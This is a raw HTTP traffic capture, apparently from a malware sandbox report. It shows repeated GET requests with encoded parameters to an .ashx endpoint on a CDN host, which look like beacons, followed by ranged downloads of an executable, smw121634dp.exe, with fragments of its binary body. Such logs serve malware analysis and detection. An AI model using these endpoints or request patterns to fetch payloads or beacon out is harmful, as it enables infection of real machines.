User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWJR0WuEl7dbF0kOkPP/ lcpu8eAfWsOK5ZLOhm7KiO348MKRqZY TBH6dnj3H5nABo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWEmvGwE2ItoihD9gPpiV Hiz4gguKWlYXXFG19d2lv/HJ3iKHvUBVBgUcVzVK9Vv1jMSmYkL7hHK6EQb8iyo3pEeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcfyawYzTk7BWxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1 3McsuF4cIQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEUbPLm xNo0/Q2TwyUgITHw7M71aw1jTiyjv1xK4cZYkyPbkKqymX8SAU 363aeyXs1AoyOtVJIk2k Fnd7x9HpjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsMss0xdmNFlbg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=lOCrbsNL2zUH/Xh5Gdj8QRto1MEeYN4JnvZi s3jtzHZ5YIGg5oNPurVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8Fd/XCztdoPbJFiFlIaXxqEcmxw368usKjODQ8kqa2OFucrnwHv6 D0kjg8U5er5Kbb8P2ueh3oC2Lhrdc92pjLAMCH7VE 0 bpzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL79A76Wdf5bQVO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWJKvgNPDm5dkjgb6v7cXpPth71QQSR2eRlO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnv6yvMdQ5ObkJ3cUen7qW8MylvemGGqkkkQqQHkZuFkc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT8IWTdc0BVRzshiWv5Ja8Fbs IILilpWF2W4ZI0w3yOP6AmNqIc/gweVlbgaese6RhKA1//X/jiUoeaRpMgDk3ufIzQ IK/nbD0C88izLTrg/fFTbMNbJ5taoe2/agTRYgklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKotwKW5Oqogj9wXQw f3NHANGpOWwcxYTkg3eP0fa/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL6tRdMI7h/vKYX3Ti/i3YPWPRIVASL5KT5tnTkM 7F4BaFpu1lQbV/yfwmWa4R8zkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWAo1JeSgT 5XmlmKz1/6dN0DuwyzS1Mqn4ls6uYy0joALkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOSp LYLDcsF6Odloy4EgwsaMMPQ SS4HkA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=emKxDesqhYd0cn8dtkQxkGzsB4UpbIWe/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8Fj0N7bp/0QtQiDxPRY4o5upR90anDedSC8zQYNnumFEUDrjljoTj1aS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=yhrBLBbZM9XWk3RCzFhOxt1vyTAtA4H6nvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJsivMaAupUnTb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO73EZkAAgR/jmD45dkR0v8UWHBzcD5RH2WGmZgVxWuSt5QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd0FDlcFDeqjJvIG12bLr74m6Sgzed9jU3Gw34XvFcQj8w== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:41 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:41 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6FzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPt9ePa7EDGSBlkjSRpv2UaTaJBfeNRzkdxluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6MAVuazOQA/ySFcG0T/jYU B 0jBTIO6c/Y3m6kr9yYrPiCC4paVhduf EAUeb6vWyyBfgdC/MPMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=xY8ohDYpM iI4k8LaFSbfxwGEJPpfW5hnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJ0ATae6NSkcuPFGXl7hYw KKij 6dP1w7xUocEPa3gnWqHhSQCg8CtCUHeR8YCF3QLiqBH6WCl3xZWevahYfV1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfHe9cth/iONogRWgA6z07xsaPrTALJM48= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=I6hFHi0H7G9mS6nlSU/NTiVyAMJyiE6S/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/EV70QiN1eataC2D7gVLsXVWyif 2VH4gFagtWkIz2IRYYxS7TafJldpRLkLxiEf34PLsGMxUda/E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:44 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:44 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /smw121634dp.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 09:28:55 GMT

Content-Range: bytes 250000-499999/3359008

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: So5oE5-DUkXFXTcVLupLZLO0DjbaO4s_cx-8d9QPnCCWLeKv4wsN9Q==
.ny.q..{k...........U....j..0[...2.......;\..L.....T.Q....Z.^...$A..s.
.)O|...u$....}.{q....j.....c....|$.~..k.x...z...K..C^#.....! 8.].!th..
p......L...\.=K.m..-.h.L.........w~...X..M....[..S.{. .ek3.VeR..Y.^.Qa
R..C...[t(..i^.N6...j.O.YGs.<)...x.x...Y....R....'.7..rt.].....d..A
....[sym?/...T....wh.......`.ww...kO.T.i.ep4O!....T.f.K.[..T.5...;.K..
.?...W...n\..a.'[email protected]=Q.....<[email protected]@iw3}BEi.).=\."M
m.>T.eL.....~....r..;....@.... ..Qu.......rP.U...s/*.[..i..j..!.*..
u.H...GX....O=..V....m.lc.....E.][....>......@..&D..n.B)....db.=..7
..Q....g...<....?..ipU...\.F.Y.......K..9.......C........M_.Z_<.
R6.......nO.....y.L.Q...K.R";.|.........r.%..j4.1.N... .....B.o.@).*.&
gt;.H~N....8..r{M...w.....S0../..s.\...}..w.~...b;.Sw.L0.;D....Z N.E..
....2.B.6([email protected]:3n.S...U..9. .jZ0U....O..v.........":j*..^~..
.............6.......i%.. . o.8..|.....tS).E..g.h#.O..#..\....L,.:..c.
....1._'. ./.Z..g.v]:.8xs.o.1....q..l..;....t..ZW....B..........rM....
..G......S.....*f.}.V.nY.._.^..S....s`6..$P{.>.s.......8...$.1..<
;..g....'?... ....9Y....b..$/X..'...%../...$...nq.h......yV.......8.p.
b/....V...~O]....U........./.'.V..<\,I...o.g..1..,..%}.KR.u..\._...
.........K.....$.Jm~..a..M ...._. D.4.<..{j..?N..Q..8...qa...`y._..
..<).[.j...y..>.6..._..02&.L.....M.*...s.0..-.E.Q........aL6....
.U.11....*[email protected]/...<..D.'.M.%I..sK..Z}...TW&.......(...G.
..)p Zusn#\d.....C.3....&.H.I.*.O.|C.*.M..Z..q.<DN....(.%M"@.......
.M.O..g.hn/.....{..H..../(........Zu$.P..9..W....F.$."3.{..m.Z..[.<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 09:28:55 GMT

Content-Range: bytes 750000-999999/3359008

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UzDcpR2CG-tuO9SxA8fXw-QQHU-HPz1IQ6f9LCn517WYbLz8DwS5Dw==
;..M..........H....V......\.........l1-.%...z....NF.......0... .e.2...
..F..>d.[.....v..TLN..%...G4...?.6..*<Y.O2...\&GNH.].4o...f.^o..
..g1L..?`......*......R......v.;a;E...Tm......P\~f.......X.:....\...@9
n.......@..].>.....=..`....T.cE.G.....U..l6..0....2....jH.&...wY..1
.zVn.T.R\.).*..nZ...m4....[.&5...V......j.....!.4..Np.......M.<..@7
..H|.'b......O..R....K...(V.kI..(S\...Q.Q.M......n.Q.<..3....s.j.b.
.....,.....f..n.LH..%.&PT KWK4....b}.'K..,L...)......u..."..}i....z...
..1b.S.i.K....)E...u.M...c%[email protected]............&..
.2.3....*..<p....MM'[email protected]%.
............p...i..#.T..._./q.A.B.......1.........(.(.$!.i[./..$@..$T.
.b..b....\a7...5=3...!..:Z.[s.KBY....,.........P.|.}[email protected]|..]...#..
..8W..]...s....q..f{NA..>A.n@#...=.S.j(A......1..;.F.*.M. .^_s .x.D
%...x.:..6.%.<..K.f.SW..o..=.A...|.&.0..(.D$.eb7[9m=7}.0......km.|.
"7..K ,.8.6.Ai..6.?.....mf...8 .Rl.wj.....,..d.k...6.f.R:..4/1.=...xp.
....9r1.K..z.j.W8.....$....."..E..(.c.B.^..r.??..c.B..cfp...z........d
..-........f..bP"K.=...9lJ1...|n...;Y_r\...{.Bw.)...&[....~..7....y`[.
.r....i..!...........7C.~..../y...B....^...._.;..N....Y=.tUYU6..hX..o.
.2.9......3"..a....F....c...Q.@m..^/\H..s....!%...y...ST.{...U....a..h
}N..7.(.V...Fy.....Ufu0.g]fOd.BX/...W......P....i$.f.\..h=.1....^..erB
........a..1U....5Q.T.c...x... ......S.z......Ep...`...-E.. I......uJ[
.1.O.>..t..5.............z.........8...2Or./..&..M....V7R..........
[email protected]_....h.:e..aOd7...V.a\.J..o..TQ....t.RY..f0...R..'....4.....<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 1250000-1499999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: u8bWJAW4ZrhHKSurJfV1TVKU64Ya8NmGDSKTd308dadUFxKh1v0Fcg==
j..8|..R......4....I.rw..*V.....X.........&.|.D'.d..)2..#...e....R0.i.
....580.n=..o....I...q.U.4.o"F.....2J.A..P...0..b..q.Rz.}....n..5.q.."
..7.....B...T...Q...Go..Z`d.E..B.G....CY...Q._Pb.A...5.[......\../W_}D
.}..-5P...=...|..%w{...........Y.T,.H..J.1..~D..f..g...|[email protected].
G.2X.*......3..fpv.]A......].{.E.X..h.Cu ^@.$&.?Z....G_.......M.q...Pv
.......aa..i9k'd....W......c....P;;.......}%...r....r...I.UE(.......N\
...VV~..c...w........>...,.l...*.4...........ye...qD......t ...>
..@........^..M.....{.....\E.z....s.e....n..1.}..^..V......:H.A.!..i|.
G'@....%........@.'#..dI..Jy`.9..'5..Fj.....F.j[..;.s...]..P...5...W..
..\.>.|f.?.............!.......|B.q...w......*..B...x,];./..m.}..kl
.L..>>\...ml&..fO.X.Ue....2....S....{.]k.Q..s.].....^..Jj..../.b
`[email protected]..>.8.={...v.A.w....(._..T..l.J...AgC.....T.....R.
.V ....IX&.!..g....Y0.......%...R..Tm.( ....AI......_.D..||.*./..<.
5....}...JC.".....J......Uq.A.-..J*..P.V...x...C7....]. ..c..-@9h..?v.
q.]d!..=...3....V.Zv.oT..c...d..q.&..rP...l:......a9;.j..........f.3..
.AC...w..E.tPS..~...[.{.,&.\.r$&......-s.......A../..l...9..[n......5.
 R<Y.q.......r..$.UH(.pw..Ob.N..Q...,W0. D{l;...j.W.^.(..)gg.?....Z
.....8R.h......4]Q.g{0q...PZE^..sL..-Zx.v......k"...e=.(?.<.m......
O0.K.aY......u.<.&.O.iX.x..=.]S..$)....q......7...h;.....f....*O...
.x....N.gP.KA..`..X.M../...........MCZ...4..........M.....h....xx.D&. 
E.\I...Kvr.nn..l.v.c.nqd..] t..!...4....]...{O..O...-jO....*.C...;h..*
<....Q.r.F\..#C...H......~.|...r...{.....2.?....?.J).........Z}<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 1750000-1999999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2gPe8cmAKFEPDJbFopHV8LverVGV2xrNLU2BYXmq2sspC2qLcEIvEA==
Tu..r..S...}....8..!....*..S?}.w.T.*8.......<...P..YQ......,X......
.BWC....`.J|... .......2..y].......Ds...x..^...b..,......z..]..wx.....
<...jn.R..o......W`.....'3H9....;....4..o.I....tK.fy..C.<...g...
..[..c.).".m..)....s......Z...j....v.5. .f.oF...&S.....G.-.~.\....c..^
.B.a....p.......K`..Fe..Z|..y. ..jp........0...... ..........J7..5..x.
N......N.... ....R.....Z.b....... ..N.W.....b.p.......pe.S...1.v9..1.m
[email protected]...^2....z.@. ........B......V..2..}.<.^.R..1"....
c..W ..%4....'[email protected]..=.=.1.R...#..2
[email protected].... .W.B.f....
~..=Z...iEL...v~M...)....g.M..680....p..7.`a.....P.fVsN0.^k...h.8.qh..
.7.4........t..z...!..u.6...%..R...<..;.}Y..p....K|.........x?..,.#
:L....'O*..P.}...3d^..-?....u...L..{{.(.f.]..vptU`...../......>..3.
n7.o_....b. .GE^..i.IR.:.S....'..........q...m...._.T..l..R.....2..'..
m.....`..X....(....v1.c..........d.bm.\.........`.E;[|..%%e.m.....jUZ.
..n....! .{4t(u...<...>0G....Ub`.T......B...x.....Q..-s.{....,J^
e...1.]..56...9/4....)c.4z*~.GO%>T..5.3^....)....xvP....^40.;...J..
.!.9..G..UMx..d...a%.*.,..%8......}.V......! .`....N. s-...u.....R..1.
.......Qg.\E<..9'.....R...F..L.c..k..xq< #..ss..d.f.&..|..a..,..
IT............y...o$.&f..b.~%..TI..]@...~....|Q.'U.Z.o.{.!.K.!...<.
0......MX/...nP.R.LxL.-.wO...r.U..G.......>.......&..H.....C.-\..H.
..q...T&.5"....#m....&p.....B..,.{....,..%.4>7./...9.nf...#.P..y...
.<.H...A...fP,....J9[.......f'R...9V....LL.3.59..D...c@...].U..<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 2000000-2249999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 7NZmZ9C4S_WsK_tMH83OqEiOYZ1zT2BwyqoCRCEOHrxBFN1EdmDFKg==
..M..HUn.W..=....Sa..s..Mh.^.B,=..._V.e3F..;...Y.1.r..A.&gS3.....;.l..
.L........_.....4..0L77.7,O..(j..~.# ..H{ ..zXg.k......=..5f|.*2./.ie.
..>..pQD 'A......\e..ME.....2....gm.lu....!..9`....{...2IY.^.n.x..$
...xl.....0..r...y[.7B..`..j...PO..?...L...h..........r...........L.ad
....uv..X.}......."...x?...w;....M.M.Vb.....0q.}gUA...G.>..%L.~....
.k.!.....i:.5.......?...1......1......NI..N.....R..<....uv....U.s.B
